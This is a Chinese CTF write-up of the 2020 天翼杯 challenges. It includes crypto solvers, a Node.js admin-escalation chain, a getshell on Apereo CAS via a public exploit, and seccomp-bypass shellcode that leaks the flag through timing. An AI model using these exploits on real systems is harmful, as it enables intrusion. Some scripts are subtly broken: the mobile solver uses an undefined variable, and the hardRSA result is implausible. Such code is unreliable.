天翼杯2020_wp_by_LQers

本文首发于“合天智汇”公众号 作者:Mr.zhang
声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!
misc
签到
from z3 import *
from pwn import *
r = remote("183.129.189.60",10023)
matrix = []
r.recvline()
for i in range(20):
    line = r.recvline().strip().decode()
    line = line.split(' ')
    matrix.append([])
    for _ in line:
        if(_ !=''):
            matrix[-1].append(int(_))
print(matrix)
s= Solver()
x = []
for i in range(0,20):
    x.append(Int('x%d'%i))
for i in range(20):
    result = 0
    for j in range(20):
        result+=x[j]*matrix[i][j]
    s.add(result==matrix[i][-1])
print(s.check())
print(s.model())
result = []
for i in range(20):
    result.append(s.model()[x[i]].as_long()) 
print(bytes(result))
# flag:L1n3ar_funct10n

crypto

easyRSA

先找出e,再穷举flag。
n = 53868412634233045090369153437747412878975425992040754576346754596620347350784422917543759897936684646663150893442998869763798006729979997564587680875175995309635877031073898192380128134509976889005408768734374216063639902277690308505919178272615191163114645916867249827856751349851814346547505622471483949937
flag = [36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 30485289317489122513627424533258350515279207179552977911285197688270281245828407217991247923748564161409175076285380310289577344106125220128702373704159801265509969544840793736965464878414914537483701234228629064639374176394892003747894000649142798022157683437062596618574582761554787284372511226003550269371, 3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603, 25710430894158079311830714889718580974171581911002161989735153974074319352353008048142133029367435263698163394834768816086041815027231628825846495139208493868114079735178838159083476440613688096615701599646904740303121960899627887799112605887484922771885397056359474573599547493670021831421281871544848617729, 19732968894700182005170322933853544733918556507218610879172101330791135258760048103574784092873604313932829411687518781796870112528816456829131236447610238430534513141439255353077893832475969071823784414902688155677656081948848412872244494057776570244585895585353001527113887752049634607310624731379054225973, 49603823166275212373225350577680850241791038694173725226894961732112441988775475186232426203286108859938201515004660268704496760935793272426803644906304390902690585052664086332034549639604388540879672250182582474531712807630874468538276983688370936840051189314399257931504052240291478721105604232683571965735, 3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753, 39111600477742118705806395027906988208445577416201550388650540742347022379939784851496417589057003798020634385485932858409451138352913390310896030166781799764397194165567776360446226818994394507391829127511769351762441609027121311846867992195447845664286406943953929567958814340505351947630455475804285727484, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 20410654833843880836232625906280502202859672782729125051826685074510132406319832186711328043576717168143926086499155426957562863035893608063763496001467692730847514246434999398419384281899893374238711551517649464555301605989912669722238859406226125066118408050493138139068479714147539973518962897827574079593, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 7921134582753161322624290128634847155380402724851782664296670731383021765698194698795488878351754017043009294851033981478038403743577671361192735771763306447070861526914346664563552250711401128380349734350523225717871629577515929322968751140532497166587257175822120828394599888045317806403391547870859918022, 10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603, 39111600477742118705806395027906988208445577416201550388650540742347022379939784851496417589057003798020634385485932858409451138352913390310896030166781799764397194165567776360446226818994394507391829127511769351762441609027121311846867992195447845664286406943953929567958814340505351947630455475804285727484, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 15747738389149130546683323352487624099130536202521411140249777871780143886920854454890229471824528461849537673346295452973409717079527784378744780352239762449801001678008011753760911978134166483356246071627173861470601418554748959055745539267882513648338847817602838808623857409763494613906204746380746041743, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 49603823166275212373225350577680850241791038694173725226894961732112441988775475186232426203286108859938201515004660268704496760935793272426803644906304390902690585052664086332034549639604388540879672250182582474531712807630874468538276983688370936840051189314399257931504052240291478721105604232683571965735, 37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388, 41816082923294550015345177100947705941041384208212791124911658070475546413503648718489777663979623501758652560264344194036417126974018212069759723298990493830911260380987927219778671357273815320923993066160279132764029408453741387628321086125359271717932477562073380143941135757967992556738856891243384983881, 2289661747463432904864726014469820089868859807681341604602724331315868027626911256942237265741150662379120096087503128257053991282511669446600149018298385954324456893093185337113453867043111379604256625373327695708031540726940582948952961996209717576768629087376812686254364929371492740503955614801880755029, 4769150487876088158092207801833930492410418508766701697944250605734573379553037277899162828229262014063643323820460512403565006283703666233290157946979202583798598785822720156680345481949741468336883744252416349425692863975145641191695837839335637368844322856886906613050961753097516258566929761607581854452, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753, 7921134582753161322624290128634847155380402724851782664296670731383021765698194698795488878351754017043009294851033981478038403743577671361192735771763306447070861526914346664563552250711401128380349734350523225717871629577515929322968751140532497166587257175822120828394599888045317806403391547870859918022, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870, 17682515232429855272035901906772793825487721364344744362854466453245309632533244423538397321529685198664897252467080139806066355278301576555901412750048173484094398286014082522669828578258761701764108260931807262691138889541639002660481520728386113333127824444193307376521294377427870384102128500516960684947, 4769150487876088158092207801833930492410418508766701697944250605734573379553037277899162828229262014063643323820460512403565006283703666233290157946979202583798598785822720156680345481949741468336883744252416349425692863975145641191695837839335637368844322856886906613050961753097516258566929761607581854452, 30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611, 33837532960782971009791077799738764896858649583072963199517227302081393621122306404955447605996320839470145314998033425661115068801570111325727613277035152575774982876149450313082012824128743218000149252557836744280911674724684003561337786214393597090329060449104920400289411467319248511722415235332423804311, 30030303315850134541983623762793648940576863243875408346383336740002014977915867166596483716837565090899781937786444667011603255898645014579568163387075249462739655058635864271192704361549774337456607506026964549661765427917083344151333423310742416015343716142879418000874164534510255100626106244640607206741]

e = 0
for ee in range(2, 20000):
    if pow(ord('f'), ee, n ) == flag[0]:
        e = ee
        break

ans = []
for f in flag:
    for ch in range(0x20, 0x7f):
        if pow(ch, e, n) == f:
            ans.append(chr(ch))
            break
print(''.join(ans))

 

hardRSA
题目脚本:
# chall.py
# flag{6809781d08e120627e623dcdafe26b8a}
p = getPrime(510)
q = getPrime(510)
r = getPrime(510)
e = 7
m = bytes_to_long(os.urandom(30) + flag)
n = p * q * r
d = invert(e, (p - 1) * (q - 1) * (r - 1))
c = pow(m, e, n)
print(n // p)
print(p)
print(c)
print(hex(d % (1 << 540)))

 

从题目看也是Coppersmith partial d的情况,只是这里由于$n$由$p、q、r$三个素数组成,因此需要我们重新推导同余方程
已知:$kbits = 540$、$p$、$qr$、$d_0$的值,$d_0 = d \mod 2^{kbits}$
推导如下:、
通过上式可以求得所有的$s \mod 2^{kbits}$的值,同时我们知道
联立公式$1 \times q$和公式$2 \times k(p-1)$,可以得到公式
$$ed_0q = q + kq(p-1)(qr-s+1) \tag{3}$$
$$k(p-1)qr = kq(p-1)(s-q) \tag{4}$$
相加得到:
$$ed_0q + k(p-1)qr = q+kq(p-1)(qr-q+1)$$
即:
$$ed_0q + k(p-1)qr-k(p-1)q(qr-q+1) = q \mod 2^{kbits}$$
解上述同余方程,即可得到$q \mod 2^{kbits}$
由于$kbits=540$,而$q$只有$510 bits$,所以解出来的就是可能的$q$的值,再通过$qr % q==0$过滤即可
def find_q(d0, kbits, e, qr, p):
    X = var('X')
    for k in range(1, e + 1):
        temp = k*(p-1)
        results = solve_mod([e*d0*X+temp*qr-temp*X*(qr-X+1)==X], 2 ^ kbits)
        for x in results:
            q = ZZ(x[0])
            if qr % q == 0:
                return q
    return None


if __name__ == '__main__':
    qr = 6857671284539062742975668483013695756136974308830302383869017675211748459038460434623218652374536550644287079851235538790745857383008797698872874798021995947967308637270510423795384863442755166813716746318469915880844736019524077541319597047087620854791342900521099848683663304636436936596021386279685708537
    p = 2141698433991046082370939321691850154692026423424010392532982575546199921995522418737105878977898158159119041866620684371362271661642476751663585379591337
    c = 4329606906986929520922207896899782825966852252045645553852666134465727605375552409314262439896695961792039946511877813768609658516837096110397826574615865145364406310497152725490038135469839136190625952342503082553246584871237205558902774064100332461452316195663446307120094941991930964324406679011451626126064494215289724959537793057773764253924636259378833228904446486925068109314698993641720938647836132806653451109926428309922461595730642461604303078237048
    d0 = 0x8e6f66a517d9c8a610eb65dac5a613e72d47a29beaa5c77a9eb857e0db5d09eadf3a317776fdf27b0d85db0b6677afc8e0683d6dc2b4580281b6e99c3050f649213c37
    e = 7
    kbits = 540
    q = find_q(d0, kbits, e, qr, p)
    print(q)
    # q = 25059487973180277588206800665839045814372025526548816268175933793538

alicehomework

经典的背包问题,而且density也远远不足0.9408
from sage.all import *
from Crypto.Util.number import long_to_bytes
pk = 
ct = 
n = len(pk)

# Sanity check for application of low density attack
d = n / log(max(pk), 2)
print(CDF(d))
assert CDF(d) < 0.9408

M = Matrix.identity(n) * 2

last_row = [1 for x in pk]
M_last_row = Matrix(ZZ, 1, len(last_row), last_row)

last_col = pk
last_col.append(ct)
M_last_col = Matrix(ZZ, len(last_col), 1, last_col)

M = M.stack(M_last_row)
M = M.augment(M_last_col)

X = M.BKZ()

sol = []
for i in range(n + 1):
    testrow = X.row(i).list()[:-1]
    print(testrow)
    if set(testrow).issubset([-1, 1]):
        for v in testrow:
            if v == 1:
                sol.append(0)
            elif v == -1:
                sol.append(1)
        break

s = sol
print(s)
result = [pow(2,len(s)-1-i)*s[i] for i in range(len(s))]
print(long_to_bytes(sum(result)))
# flag{8130e8c14fe4df06558c0a7ebf06f272}

web

APITest
最近新学了nodejs,什么,我写的 API 有问题?【大部分flag为此形式:flag{可见字符串}或DASCTF{可见字符串},只需提交花括号内的可见字符串(大小写敏感);如果flag为其他形式,题目中会单独说明。】
http://183.129.189.60:54800
POST /becomeAdmin

{"value": 0.00000001}

其他步骤基本一致

  1. 随便登录一个用户
 
 
  1. POST /becomeAdmin,利用javascript的sort特性得到admin权限
 
  1. /updateUser,增加查看secret的权限
 
 
  1. 查看/serverInfo 拿到 secret
 
  1. /init 传secret和上面拿到的一样,就拿到了admin的token了
 
  1. 用token访问/flag,拿到flag
 
 
apereocas
open /cas, getshell and flag in /flag【大部分flag为此形式:flag{可见字符串}或DASCTF{可见字符串},只需提交花括号内的可见字符串(大小写敏感);如果flag为其他形式,题目中会单独说明。】 http://183.129.189.60:55001 https://xpro-adl.91ctf.com/userdownload?filename=2007305f227ddc95f2e.war&type=attach&feature=custom
EXP直接打就可以了 https://github.com/langligelang/CAS_EXP
把源码里面的whoami改成其他命令,最后cat /flag
 
 
 
 
DASCTF{7754cef7ac0cc97ff61262d3c888d482}
pwn
SafeBox
沙箱,open和read,没有write
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
 0005: 0x15 0x06 0x00 0x00000002  if (A == open) goto 0012
 0006: 0x15 0x00 0x06 0x00000000  if (A != read) goto 0013
 0007: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # read(fd, buf, count)
 0008: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0012
 0009: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0013
 0010: 0x20 0x00 0x00 0x00000010  A = fd # read(fd, buf, count)
 0011: 0x35 0x00 0x01 0x00000004  if (A < 0x4) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL

vmmap在0x10000,可以直接放置"/home/pwn/flag"

open后read,使用cmp比较,等于则使用jz进行死循环,否则ret退出
构造payload不能有'\x00',可以用一些操作达到,这里我用右移
from pwn import *

EXCV = context.binary = './chall'
e = ELF(EXCV)

if args.I:
    context.log_level = 'debug'

def pwn(p, index, ch):
    # open
    shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"

    # re open, rax => 4
    shellcode += "push 2; pop rax; syscall;"

    # read(rax, 0x10040, 0x50)
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
    
    # cmp and jz
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)

    shellcode = asm(shellcode)

    p.sendafter("safe-execution box?\n", shellcode.ljust(0x40-14, b'a') + b'/home/pwn/flag')

index = 0
ans = []
while True:
    for ch in range(0x20, 127):
        if args.R:
            p = remote('183.129.189.61',  60402)
        else:
            p = process(EXCV)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        if end-start > 1.5:
            ans.append(ch)
            print("".join([chr(i) for i in ans]))
            break
    else:
        print("".join([chr(i) for i in ans]))
        break
    index = index + 1

print("".join([chr(i) for i in ans]))
DASCTF{0ee3530c57fb0b9c89e7af5d32b9f521}
re
mobile
发现有init 下断点,dump出init以后的方程组
from scipy import linalg
import numpy as np
A = np.array([[13,144,129,36,58,38,53,40,103,125,97,19,68,132,31,148,150,96,118,37,30,143,134,37,96,42,129,84,111,66,13,48],
[127,111,102,17,111,100,120,73,34,144,78,86,133,48,64,141,110,15,10,37,128,119,68,104,137,12,97,29,46,11,116,116],
[131,124,54,57,55,122,74,123,57,44,63,131,81,86,56,92,31,118,98,135,66,115,51,128,102,67,41,40,41,144,53,84],
[105,121,74,132,40,66,62,61,18,103,107,51,133,85,132,137,52,42,69,79,70,147,54,43,50,145,54,69,58,58,47,136],
[74,42,58,65,62,134,53,56,143,74,70,84,33,112,36,61,41,17,93,111,66,85,62,37,133,149,144,41,103,55,16,125],
[132,117,53,57,104,125,10,78,19,34,25,126,134,139,90,22,138,142,56,87,43,116,39,74,105,61,54,48,62,136,87,129],
[68,132,28,102,69,71,36,72,59,114,96,55,71,75,126,76,89,106,116,33,138,143,144,15,65,86,61,79,64,24,62,10],
[99,14,24,141,45,68,25,124,120,108,29,71,38,10,83,63,121,44,30,112,107,85,66,82,56,137,39,34,39,58,116,125],
[45,62,120,103,55,148,56,81,89,99,51,113,80,79,102,41,27,46,62,33,74,70,100,56,37,129,102,112,137,13,48,145],
[52,61,60,47,57,80,111,150,44,78,16,59,131,24,45,106,51,78,146,19,113,105,137,16,47,96,84,33,89,135,60,139],
[60,123,121,10,28,65,43,111,144,118,11,26,37,84,103,12,14,57,126,54,27,116,78,103,128,73,135,107,102,63,98,78],
[60,67,58,48,119,54,78,10,45,46,120,138,67,27,148,61,69,29,34,104,116,55,72,98,88,137,72,86,118,79,29,113],
[67,62,119,70,136,125,47,145,27,80,75,69,40,145,37,37,97,41,114,90,99,87,144,130,66,10,42,43,144,130,71,110],
[112,123,138,117,118,52,64,120,90,140,95,122,22,33,123,29,147,100,133,92,106,39,48,101,30,149,86,117,15,61,28,96],
[76,36,111,139,53,16,93,74,132,24,123,49,91,24,87,40,32,74,130,73,13,135,88,46,105,53,40,49,48,63,15,34],
[131,89,133,145,112,124,81,129,105,78,121,69,10,129,133,27,123,108,117,121,55,122,38,128,136,53,81,29,70,45,127,40],
[134,133,51,63,124,110,47,117,75,34,148,29,112,90,87,83,123,25,20,148,81,38,95,129,117,72,48,33,104,38,21,143],
[114,141,18,75,71,113,120,48,37,59,102,133,120,80,113,49,138,23,78,75,11,141,76,72,17,23,118,61,105,83,66,135],
[113,83,105,92,102,24,58,126,46,23,34,83,89,62,102,69,16,102,103,147,46,28,101,42,20,17,27,11,132,133,119,68],
[65,41,95,41,134,135,135,53,38,131,93,71,82,49,115,48,80,68,50,51,28,90,101,34,24,145,75,146,120,60,93,112],
[24,82,139,150,113,128,36,130,47,32,93,53,122,39,96,19,131,33,42,123,80,113,108,24,73,117,131,81,29,66,20,149],
[28,124,56,35,59,120,96,113,87,111,80,123,134,64,87,87,114,146,123,23,125,55,115,61,36,77,124,105,23,141,110,49],
[112,85,116,86,54,150,85,86,108,86,45,36,87,122,51,54,75,44,104,103,35,128,143,73,69,13,47,38,68,12,122,50],
[65,27,109,105,60,124,90,12,51,61,26,143,140,37,65,13,52,139,77,89,138,114,107,23,141,23,85,74,119,106,90,116],
[20,64,138,52,23,97,52,38,135,65,26,134,135,14,143,32,110,52,50,80,133,66,69,90,78,20,147,28,115,27,93,48],
[81,96,121,62,145,94,10,22,105,23,125,105,42,130,139,85,29,19,38,51,98,139,85,80,106,55,41,42,149,145,12,74],
[18,132,72,121,138,97,104,74,40,81,33,103,113,85,32,29,146,88,27,137,36,126,32,56,37,29,82,89,79,100,87,72],
[90,93,68,87,52,75,138,122,138,84,141,13,59,113,102,119,137,55,27,146,52,18,65,78,44,135,139,88,107,138,116,16],
[44,100,139,101,13,76,68,17,56,74,72,27,102,28,70,108,46,39,34,46,142,17,141,60,52,103,136,70,20,102,147,98],
[55,17,14,33,77,134,147,75,124,60,82,116,26,146,49,110,44,128,54,147,107,58,66,143,24,90,22,92,139,73,141,129],
[134,84,27,62,46,34,58,144,43,136,107,11,82,95,24,117,57,113,73,44,91,141,44,60,128,142,96,57,127,60,74,54],
[138,119,118,61,130,146,11,65,92,82,60,114,54,139,148,84,110,141,142,84,21,70,54,120,48,93,104,98,39,103,29,104]])  # A代表系数矩阵
y = np.array([0x384E9, 0x3AFD0, 0x398A1, 0x3B564, 0x34B76, 0x3C62C, 0x37432, 0x32D5D,0x38F35, 0x353F9, 0x357BC, 0x36AD4, 0x3B78A, 0x41D2D, 0x2F302, 0x43F88,0x3D180, 0x3C9E2, 0x330D3, 0x3DBB3, 0x3D102, 0x3FA50, 0x3859F, 0x396B7,0x336FD, 0x35B83, 0x39701, 0x402F4, 0x36160, 0x3C29B, 0x373F5, 0x43A68])
x = linalg.solve(A, y)
print(x)   
flag = [102, 108, 97, 103, 123, 119, 101, 49, 49, 95, 121, 48, 117, 95,
 102, 48, 117, 110, 100, 95, 49, 55, 95, 99, 48, 110, 103, 114,
 52, 55, 122, 125]
flag = ""
for i in range(len(flag)):
    flag += chr(flag1[i])
print(flag)
posted @ 2020-08-05 16:00  合天网安实验室  阅读(596)  评论(0编辑  收藏  举报